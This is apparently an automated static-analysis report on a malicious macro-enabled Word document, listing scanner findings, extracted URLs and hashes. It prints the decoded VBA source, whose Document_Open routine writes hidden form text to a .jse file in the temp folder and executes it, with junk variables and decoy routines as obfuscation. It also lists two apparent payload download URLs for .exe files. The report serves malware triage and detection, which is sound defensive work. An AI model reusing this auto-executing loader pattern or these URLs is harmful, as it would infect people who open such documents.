Verdict: MALICIOUS
Risk score: 120
Heuristics matched: 7
| Finding | Severity | Rule | Details |
|---|---|---|---|
| VBA project inside OOXML | medium | OOXML_VBA | Document contains a VBA project — VBA macros present (4 related findings) |
| CreateObject call | high | OLE_VBA_CREATEOBJ | Matched line in script: `CreateObject(thereSim).ShellExecute someLittleShot` |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below. |
| Document_Open macro | low | OLE_VBA_DOCOPEN | Matched line in script: `Private Sub Document_Open()` |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Matched line in script: `someLittleShot = Environ("TEMP")` |
| Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Extracted URLs:

| URL | Where found |
|---|---|
| https://bestefoto.no/ins4.exe | In document text (OOXML body / shared strings) |
| https://airmousse.vn/ins1.exe | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/drawing/2014/chartex | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/drawing/2015/9/8/chartex | In document text (OOXML body / shared strings) |
| http://schemas.openxmlformats.org/markup-compatibility/2006 | In document text (OOXML body / shared strings) |
| http://schemas.openxmlformats.org/officeDocument/2006/relationships | In document text (OOXML body / shared strings) |
| http://schemas.openxmlformats.org/officeDocument/2006/math | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing | In document text (OOXML body / shared strings) |
| http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing | In document text (OOXML body / shared strings) |
| http://schemas.openxmlformats.org/wordprocessingml/2006/main | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/word/2010/wordml | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/word/2012/wordml | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/word/2015/wordml/symex | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/word/2010/wordprocessingGroup | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/word/2010/wordprocessingInk | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/word/2006/wordml | In document text (OOXML body / shared strings) |
| http://schemas.microsoft.com/office/word/2010/wordprocessingShape | In document text (OOXML body / shared strings) |
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7593 bytes |

SHA-256: eb0e098a4b95d89e1fe334a47ac908fe63a4979d87efde00e092ce539051c8e0
Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BigCardText()
    Dim sDigits As String
    Dim sBigStuff As String
    sBigStuff = ""
    Dim Jpg812d398ro As String
    Jpg812d398ro = "imagine breathing alive somewhere ever raise born arrive account rich actually circle column twice height needle aloud range next he gain only beauty afternoon nearby date pet protection any engineer brass yellow over process practical wing onto prove chamber raw ice given plane voice far complete ring stiff red seeing must loss scene adjective gravity lovely rod worse successful such eleven drop edge surrounded available raise trail heading travel grabbed mixture baby value station mental foot cut needle allow air empty stranger breakfast naturally idea known constantly gentle trip sure exact excellent mouse engineer smaller zulu breathe flat real pressure rear action ranch pleasant setting"
    ' Select the full number in which the insertion point is located
    Selection.MoveLeft Unit:=wdWord, Count:=1, Extend:=wdMove
    Selection.MoveRight Unit:=wdWord, Count:=1, Extend:=wdExtend
    ' Store the digits in a variable
    sDigits = Trim(Selection.Text)
    If Val(sDigits) > 999999 Then
        If Val(sDigits) <= 999999999 Then
            sBigStuff = Trim(Int(Str(Val(sDigits) / 1000000)))
            ' Create a field containing the big digits and
            ' the cardtext format flag
            Selection.Fields.Add Range:=Selection.Range, _
                Type:=wdFieldEmpty, Text:="= " + sBigStuff + " \* CardText", _
                PreserveFormatting:=True
            ' Select the field and copy it
            Selection.MoveLeft Unit:=wdWord, Count:=1, Extend:=wdExtend
            sBigStuff = Selection.Text & " million "
            sDigits = Right(sDigits, 6)
        End If
    End If
    If Val(sDigits) <= 999999 Then
        ' Create a field containing the digits and the cardtext format flag
        Selection.Fields.Add Range:=Selection.Range, _
            Type:=wdFieldEmpty, Text:="= " + sDigits + " \* CardText", _
            PreserveFormatting:=True
        Dim J386P00qx As Long
        J386P00qx = 3511
        Dim t3kspj7Q38 As Long
        t3kspj7Q38 = 7174
        ' Select the field and copy it
        Selection.MoveLeft Unit:=wdWord, Count:=1, Extend:=wdExtend
        sDigits = sBigStuff & Selection.Text
        ' Now put the words in the document
        Selection.TypeText Text:=sDigits
        Selection.TypeText Text:=" "
    Else
        MsgBox "Number too large", vbOKOnly
    End If
End Sub
Private Function thereSim()
    Dim formsT As String
    formsT = UserForm1.CommandButton1.Caption
    Dim t72rY697w6m9 As Long
    t72rY697w6m9 = 1174805
    Dim yjiTB3c797a6 As Long
    yjiTB3c797a6 = 2740
    thereSim = Mid(formsT, 5, 17)
End Function
Public Sub FixToolTip()
    Const sToolTip As String = "My ToolTip Text"
    Const sTBName As String = "Standard"
    Const iBtnIdx As Integer = 5
    CommandBars(sTBName).Controls(iBtnIdx).TooltipText = sToolTip
End Sub
Private Function thereSomeSrc()
    Dim src As String
    src = UserForm2.TextBox1.Text
    Dim I29H9WxMm0E As String
    I29H9WxMm0E = "worry wear metal star knew throw thick pig hit yellow research behind spin raise pure ship shape sand lack move been from luck guess improve settlers learn welcome principle few accept happily cent lead wooden slowly seeing row broke known money feet related slight back favorite come center harbor stay rubbed spent border fat garden complex outline are musical using select likely paragraph oxygen golden realize unusual characteristic union active greater yourself bow wrapped small collect single influence sudden of breathe ask powder tool art anywhere dust mile nest clay swept affect lost dropped final gasoline from left gate voyage means fair rising dropped dance both studying middle mouse engine twice dish thus aware earn log organization"
    thereSomeSrc = UserForm1.TextBox1.Text
End Function
Sub Readability()
    Dim DocStats As String
    Dim MBTitle As String
    Dim J As Integer
    Dim jBB7hs2ald As String
    jBB7hs2ald = "stick neck monkey load development sun strength thread stared alone wooden mother baby typical master importance goes laugh sea swept fog pull sort rocky prove gate stretch power changing order society sky rest bark upon able heading between promised flower school boat appropriate alive perfectly typical away then couple tip kill fog root actually underline did settle simple pilot farmer again saddle ahead needle brick whether period provide about control underline rocket ride stranger courage one gate wonderful lovely substance southern pure planet can speak share globe mathematics source ancient notice grandmother again tomorrow brick program sing service plastic likely nuts learn article lay enemy mission sitting growth serve seed youth how fed stop sentence pull layers"
    MBTitle = "Readability Statistics"
    DocStats = ""
    With ActiveDocument.Content
        For J = 1 To 10
            DocStats = DocStats & .ReadabilityStatistics(J)
            DocStats = DocStats & ": "
            DocStats = DocStats & .ReadabilityStatistics(J).Value
            DocStats = DocStats & vbCrLf
        Next J
    End With
    MsgBox DocStats, vbOKOnly, MBTitle
End Sub
Private Sub Document_Open()
    Dim someLittleShot As String
    someLittleShot = Environ("TEMP")
    someLittleShot = someLittleShot & "\"
    someLittleShot = someLittleShot & Rnd
    someLittleShot = someLittleShot & ".jse"
    Dim lH46671l As String
    lH46671l = "water story question plan last flat settlers plate ancient lying ocean battle grain suddenly bread union including corn military typical likely exercise boat stranger powder science needs animal include thought along merely stepped acres atom complete flight direction speak begun spoken luck lunch proud special average sense grow forget battle voyage her high current fish themselves stranger handle fighting ring lungs boy wheat moon atomic result just wore father plane luck wild pool throat naturally lamp onto valley nice suddenly date least watch gather studied court older born slight broke card leader began moon buried tank had favorite world affect sign toy meal select try yard freedom total paragraph add method help fill know which tonight happened does"
    Open someLittleShot For Output As #98
    Print #98, thereSomeSrc
    Close #98
    Dim e8cqE3 As Long
    e8cqE3 = 9462687
    Dim O048hE82 As Long
    O048hE82 = 7985
    CreateObject(thereSim).ShellExecute someLittleShot
    Dim Ma2W45Q1z As Boolean
    Ma2W45Q1z = True
End Sub

Attribute VB_Name = "NewMacros"
Sub n()
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8BFB0E4B-D26A-4616-A700-38D0696ABC88}{5C4A81C5-BA9E-41D7-A4A0-BD84EEB9C4E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{3859E691-853D-4209-9764-C45706B9FFC7}{881332B0-F0CC-477A-B8F3-C22DB9A215BC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 99328 bytes |

SHA-256: 27a55954986ef092169baaa16657dd2e3dd4cf6ba9d62dab4334208938f1404e

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 13 long base64-like blob(s).